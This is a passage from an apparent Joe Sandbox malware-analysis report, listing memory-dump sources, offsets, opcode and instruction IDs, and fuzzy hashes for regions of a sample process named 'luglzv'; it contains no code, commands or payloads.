                                                                    • Instruction Fuzzy Hash: B8518E32A1455A8BCB18DF58C980BADFBF3AF94314F69852DD546AB645C734BC80CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6759581a02569af1c3160f096f0f56a7153cf41a12dabf4a6cbc437b58d78d0
                                                                    • Instruction ID: 1e7f4d0af2de4e008b80e658332d5be8bad70f3e8d66d1ad0a4e895217ce23b1
                                                                    • Opcode Fuzzy Hash: e6759581a02569af1c3160f096f0f56a7153cf41a12dabf4a6cbc437b58d78d0
                                                                    • Instruction Fuzzy Hash: B6413171A00219CFCF04DFA8C991ADDB7B6FF88300B148569E805AF346DB71AD46DBA0
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 86c346757212fa2d8da22032ba6f66b4fcc0a7db0633f9ee7a24432fcdfd2646
                                                                    • Instruction ID: d08508b43346cf767b795504bd78d1558b1eda891f930448b6b649c1188f1f59
                                                                    • Opcode Fuzzy Hash: 86c346757212fa2d8da22032ba6f66b4fcc0a7db0633f9ee7a24432fcdfd2646
                                                                    • Instruction Fuzzy Hash: 6C312BB0B002069FCB04EBA8D591B9EBBF2FB88310F10852DE505EB346DB759D419BB0
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26ba25f499b0d1f93a68d6048c2d84c85094f8f363e97e7e74e152865b251c36
                                                                    • Instruction ID: 55ff11cdcead306affce0a4c963ff3aa4ff911e96911103e50bbf0f504c2a6fe
                                                                    • Opcode Fuzzy Hash: 26ba25f499b0d1f93a68d6048c2d84c85094f8f363e97e7e74e152865b251c36
                                                                    • Instruction Fuzzy Hash: 5431EE78E01209DFCB05DFB4D6505AEBBB2EF89700F104569C416AB368EB355A46CF91
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1f62f0b4d4a425d55e806d23f56f8a283bc3a8f36fd34abefc3fa7396b5cede6
                                                                    • Instruction ID: 1939d4fd57ab77e27474032fbe22e2340909170046ef8aeace9109d47fd9c4fe
                                                                    • Opcode Fuzzy Hash: 1f62f0b4d4a425d55e806d23f56f8a283bc3a8f36fd34abefc3fa7396b5cede6
                                                                    • Instruction Fuzzy Hash: BA313071F002059FCF14AFA5E9596AEBBF6FB88311F144029E806E7354DB399D418F64
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90622269fd0e926a0c2eb36142e976204e68e51c466d4d48a0b33855f4c8030e
                                                                    • Instruction ID: c7455dce1e6d80c5dbd392dc8486d5c8d06aeefcf26129fca7ec03c5ee0b8f5e
                                                                    • Opcode Fuzzy Hash: 90622269fd0e926a0c2eb36142e976204e68e51c466d4d48a0b33855f4c8030e
                                                                    • Instruction Fuzzy Hash: 2331CC78E00209DFCB44EFB4D6905AEB7B6EF88701F104569C416AB368EB359A42CF91
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42f03cb0ab800ec00e1eb0cef70c1806d5548ca35d27acfa4973410f310b0a32
                                                                    • Instruction ID: e4db89ef82a406acb9745cad20e4fa0a1b5f13a51ab35192a33d181d506b0a57
                                                                    • Opcode Fuzzy Hash: 42f03cb0ab800ec00e1eb0cef70c1806d5548ca35d27acfa4973410f310b0a32
                                                                    • Instruction Fuzzy Hash: 0C2125B1504200EFDB15DF14D9C0B66BF66FB98328F24C569E90A0B256C336D896DBA2
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7e9ba2a0555c622eff7a341850a4fb4a4641e01c732aca380529f44aa81231c0
                                                                    • Instruction ID: cc53ffd627200f429fd4d697b54f83553d1dd5b7c2ac5d1a6f3ae9b7f1f18bd6
                                                                    • Opcode Fuzzy Hash: 7e9ba2a0555c622eff7a341850a4fb4a4641e01c732aca380529f44aa81231c0
                                                                    • Instruction Fuzzy Hash: 1611A735B155178FCB50DBA8A9907EEB7B6EB88310B14417AC805D7249E730DE068BE5
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbf6906d7f428ea58813ae2a2dae3a1316f37650c586e0a8d3e48c6f0e9ddb08
                                                                    • Instruction ID: 335b0a5cb694f834d1c60c65ff0d802766e035d59e48a07b25bf5434e6ffa7a2
                                                                    • Opcode Fuzzy Hash: cbf6906d7f428ea58813ae2a2dae3a1316f37650c586e0a8d3e48c6f0e9ddb08
                                                                    • Instruction Fuzzy Hash: 05118F31B081168FCB50EFACA9507EE77F6EB88350B24417AC905D7249E731D9028BE1
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3775e3d7efd3f385c7ab78d2d28626814df46cc6514dda3941fc0abd23c2307b
                                                                    • Instruction ID: f904e12f8a8419d626d44a48c885baf39c6a3b7058dd7c401af561eca3781649
                                                                    • Opcode Fuzzy Hash: 3775e3d7efd3f385c7ab78d2d28626814df46cc6514dda3941fc0abd23c2307b
                                                                    • Instruction Fuzzy Hash: AD219D38604255CFCF15AB74D815BAD7BB2FF8A304F14446CD006AB3A2CB768D05CB68
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5ff165a0a4acf928cdd06dd43516c0ea38611eabd3510197ce3c9e8f0df6867
                                                                    • Instruction ID: a9ce2a9573f8043da05b1f448ff03b94573955231a3610f18455e737b71d97a0
                                                                    • Opcode Fuzzy Hash: a5ff165a0a4acf928cdd06dd43516c0ea38611eabd3510197ce3c9e8f0df6867
                                                                    • Instruction Fuzzy Hash: 09212178604215CFDF14ABB4C815BAE7BB2EF49705F14446CD101AB791CB758D01CBA9
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b800023aa5d6e4a1e3a6d498017d7bcbe75e8dcfba687f91a0879d8db9dcb9e
                                                                    • Instruction ID: 1a47bb9621f06f3126f8e304b4d362639761768cfd2686838b02bde84846fd96
                                                                    • Opcode Fuzzy Hash: 2b800023aa5d6e4a1e3a6d498017d7bcbe75e8dcfba687f91a0879d8db9dcb9e
                                                                    • Instruction Fuzzy Hash: 0101D6327006055BCB14AB68EC85B9A7BAAEBC9710F04487EE6568B345DF70A9059790
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: d2a47a06d57ada88107d609545dcdaf1bafb484c166ccff576060a5388e59185
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: D6112672404240CFCF12CF04D5C0B56BF72FB94324F24C6A9D9090B256C33AD89ACBA2
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65cf83b7a1800b9a1666e6b6e8fcbac0515965ea7fd66ea72dbf412d04931479
                                                                    • Instruction ID: 7b4c55406b497b3a5c9b978e8efbaf592913c49cef93d9fa9309517e90180385
                                                                    • Opcode Fuzzy Hash: 65cf83b7a1800b9a1666e6b6e8fcbac0515965ea7fd66ea72dbf412d04931479
                                                                    • Instruction Fuzzy Hash: 0B119E34F592078BCB48EB64F5A8A6E7772FB85340B208915D8525B79CDE799C01AB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e587acbd933f02393eb8c5d2bb84cb8d8a70b839b221fc2a9e7de6c56d8ace48
                                                                    • Instruction ID: 1359c4f962d45b06b94fe5e619a3db4ab6429c790ef759e5156e0925d4f05279
                                                                    • Opcode Fuzzy Hash: e587acbd933f02393eb8c5d2bb84cb8d8a70b839b221fc2a9e7de6c56d8ace48
                                                                    • Instruction Fuzzy Hash: FD0169333141110FCB14A6BEB85466EB7DAEBC8676B14443BE50EC3399DEA6CC4547A0
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6c97f4f67d8c639669e362eb2e02a95cae76c58d358e430d2e785aad34f634a
                                                                    • Instruction ID: 1706205f8f9f343b6b43afea9c0590637b8c243649345e23fec34f56b2eb9530
                                                                    • Opcode Fuzzy Hash: a6c97f4f67d8c639669e362eb2e02a95cae76c58d358e430d2e785aad34f634a
                                                                    • Instruction Fuzzy Hash: A211D034F552078FCB48EB64F5A8A6E7772FB84340B108915D8525B79CDF799C01EB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2606df10977c76b1527c7c425e45e273faa0bb312fa83143197f0b7e5658946
                                                                    • Instruction ID: 910e092fdd48a89a9ec4ef8cf60685c554e0a695da65555c67523232ed4ff35e
                                                                    • Opcode Fuzzy Hash: c2606df10977c76b1527c7c425e45e273faa0bb312fa83143197f0b7e5658946
                                                                    • Instruction Fuzzy Hash: D8012B720043049AE7104B65DCC0BA7FFECDF41334F18C45AED094A182C7389880D7B1
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc10f40ce90d489dcd13da5879996421ac6568c4df5c8ab56ae821a4d74664f
                                                                    • Instruction ID: a2394e482d7968a4a5dae2478bf1f80228249bf8d24ce49d803083784ae0ac61
                                                                    • Opcode Fuzzy Hash: 4bc10f40ce90d489dcd13da5879996421ac6568c4df5c8ab56ae821a4d74664f
                                                                    • Instruction Fuzzy Hash: B90162B1E0010A9FCF40DFADE4416DEBFF5EB49310B10416AD154E7200EB319945CBA5
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6046165598b0c82f14733da7886ccd732fa1517fc1048d2d0c3dadfc571122ff
                                                                    • Instruction ID: ad1fe3f3a36dec90133f38377039ec090fb7b86039caea955ab91fe5c2989663
                                                                    • Opcode Fuzzy Hash: 6046165598b0c82f14733da7886ccd732fa1517fc1048d2d0c3dadfc571122ff
                                                                    • Instruction Fuzzy Hash: 20F03175E042099F8B10EFA9E9856DEBFF4EB8D310B1440BAD505E7341EB319A09CBB5
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bffcee540502b0e07795d251adaab8f0770cc86e46d0c96b1d27afd3fe184f50
                                                                    • Instruction ID: 292db020d4434ab0619cc6738049ad6c9a6a99d6274ebddfced20f82acbb9827
                                                                    • Opcode Fuzzy Hash: bffcee540502b0e07795d251adaab8f0770cc86e46d0c96b1d27afd3fe184f50
                                                                    • Instruction Fuzzy Hash: 7001E134F152078FCB48EB64F5A8A6E7772FB843407108815D8525B79CDF795C01EB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd86a21ea4c772ec9b6349fefcceef9e5d1bc8d17c81d9662b93fcfc4755953f
                                                                    • Instruction ID: a22412c002ef6eefeffffd86b1cdac53390c19f37595f8e33ee6f88f47f9da21
                                                                    • Opcode Fuzzy Hash: fd86a21ea4c772ec9b6349fefcceef9e5d1bc8d17c81d9662b93fcfc4755953f
                                                                    • Instruction Fuzzy Hash: 52F06272404344AEEB208B56D9C4B66FFDCEB51734F18C45AED484B686C3799884CAB1
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cff4a79e9fb27c908ed631411bc1527146222f75993ad665291e842cc405b9ce
                                                                    • Instruction ID: 86719655436a5ba0e890bf97ec63b082e5ffadb67c3b51d9bded8d6aeb57512f
                                                                    • Opcode Fuzzy Hash: cff4a79e9fb27c908ed631411bc1527146222f75993ad665291e842cc405b9ce
                                                                    • Instruction Fuzzy Hash: AFF01234F0420BCFCB08EB64F59866E7772FB84340B108815D8429B39CDF795C01AB80
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3c99c0aa2572f661957a1aae543fd85e1d51eefca7facf8c436cc349c8c7670
                                                                    • Instruction ID: 85511f6d9530a8cd78564143b9673155b0ad532496f9e26ca3b8fd72d587ddaa
                                                                    • Opcode Fuzzy Hash: d3c99c0aa2572f661957a1aae543fd85e1d51eefca7facf8c436cc349c8c7670
                                                                    • Instruction Fuzzy Hash: 87D05E34B001168BCB04E668A4546AD3772E784340B104410D8059B288DF344D129B81